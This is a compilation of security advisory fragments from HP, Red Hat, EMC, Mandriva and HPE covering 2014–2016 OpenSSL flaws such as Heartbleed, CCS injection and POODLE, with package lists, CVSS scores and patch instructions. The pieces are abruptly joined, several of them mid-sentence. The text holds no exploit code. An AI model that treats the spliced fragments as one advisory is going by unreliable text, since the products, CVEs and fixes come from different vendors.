Insight Control server deployment v7.3.1 and follow the\nsteps below for v7.3.1. \n\nHP Insight Control server deployment users with v7.3.1:\n\nPerform steps 1 - 4 as outlined above for users with HP Insight Control\nserver deployment v7.1.2, v7.2.0, and v7.2.1. \nDownload the HP SUM ZIP file from\nhttp://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f\n\nExtract the contents from the HP SUM ZIP file to\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components location on the Insight Control\nserver deployment server\n\nRelated security bulletins:\n\nFor System Management Homepage please see Security bulletin HPSBMU03051 https\n://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04\n345210\n\nFor HP Version Control Agent please see Security bulletin HPSBMU03057 https:/\n/h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434\n9897\n\nHISTORY\nVersion:1 (rev.1) - 8 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2014:0625-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0625.html\nIssue date: 2014-06-05\nCVE Names: CVE-2010-5298 CVE-2014-0195 CVE-2014-0198 \n CVE-2014-0221 CVE-2014-0224 CVE-2014-3470 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nIt was found that OpenSSL clients and servers could be forced, via a\nspecially crafted handshake packet, to use weak keying material for\ncommunication. A man-in-the-middle attacker could use this flaw to decrypt\nand modify traffic between a client and a server. (CVE-2014-0224)\n\nNote: In order to exploit this flaw, both the server and the client must be\nusing a vulnerable version of OpenSSL; the server must be using OpenSSL\nversion 1.0.1 and above, and the client must be using any version of\nOpenSSL. For more information about this flaw, refer to:\nhttps://access.redhat.com/site/articles/904433\n\nA buffer overflow flaw was found in the way OpenSSL handled invalid DTLS\npacket fragments. A remote attacker could possibly use this flaw to execute\narbitrary code on a DTLS client or server. (CVE-2014-0195)\n\nMultiple flaws were found in the way OpenSSL handled read and write buffers\nwhen the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or\nserver using OpenSSL could crash or unexpectedly drop connections when\nprocessing certain SSL traffic. (CVE-2010-5298, CVE-2014-0198)\n\nA denial of service flaw was found in the way OpenSSL handled certain DTLS\nServerHello requests. A specially crafted DTLS handshake packet could cause\na DTLS client using OpenSSL to crash. (CVE-2014-0221)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed\nanonymous Elliptic Curve Diffie Hellman (ECDH) key exchange. A specially\ncrafted handshake packet could cause a TLS/SSL client that has the\nanonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter\nof CVE-2014-0224, J\u00fcri Aedla as the original reporter of CVE-2014-0195,\nImre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix\nGr\u00f6bert and Ivan Fratri\u0107 of Google as the original reporters of\nCVE-2014-3470. \n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1087195 - CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free\n1093837 - CVE-2014-0198 openssl: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference in do_ssl3_write()\n1103586 - CVE-2014-0224 openssl: SSL/TLS MITM vulnerability\n1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake\n1103598 - CVE-2014-0195 openssl: Buffer overflow via DTLS invalid fragment\n1103600 - CVE-2014-3470 openssl: client-side denial of service when using anonymous ECDH\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.14.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\n\nppc64:\nopenssl-1.0.1e-16.el6_5.14.ppc.rpm\nopenssl-1.0.1e-16.el6_5.14.ppc64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.ppc.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.ppc64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.ppc.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-16.el6_5.14.s390.rpm\nopenssl-1.0.1e-16.el6_5.14.s390x.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.s390.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.s390x.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.s390.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.14.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.ppc64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.ppc64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.s390x.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.s390x.rpm\nopenssl-static-1.0.1e-16.el6_5.14.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.14.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2010-5298.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0195.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0198.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0221.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0224.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3470.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/site/articles/904433\nhttps://access.redhat.com/site/solutions/905793\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTkGAKXlSAg2UNWIIRAnrwAJ9sLrj3wCAZhJU00jxgt03unDAHywCfVjUB\npJJhdOUzRUL8R2haDM4xrsk=\n=hZF8\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. \tUnvalidated Redirect Vulnerability (CVE-2015-0512)\n\nA potential vulnerability in Unisphere Central may allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. The attacker can specify the location of the arbitrary site in the unvalidated parameter of a crafted URL. If this URL is accessed, the browser is redirected to the arbitrary site specified in the parameter. \n\nCVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)\n\n2. To search for a particular CVE, use the NVD database\\x92s search utility at http://web.nvd.nist.gov/view/vuln/search\n\nResolution: \nThe following Unisphere Central release contains resolutions to the above issues:\n\\x95\tUnisphere Central version 4.0. \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS\nkz0ex6eI6hA6qSwklA2NoXY=\n=GYjX\n-----END PGP SIGNATURE-----\n. These vulnerabilities include: \n\n* The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \n\n - HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2010-5298\n 4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\n 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)\n\n CVE-2014-0076\n 4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2014-0195\n 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0198\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0221\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0224\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-3470\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-3566\n 3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\n 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2016-0705\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE recommends applying the following software updates to resolve the\nvulnerabilities in the impacted versions of HPE StoreVirtual products running\nHPE LeftHand OS. \n\nLeftHand OS v11.5 - Patches 45019-00 and 45020 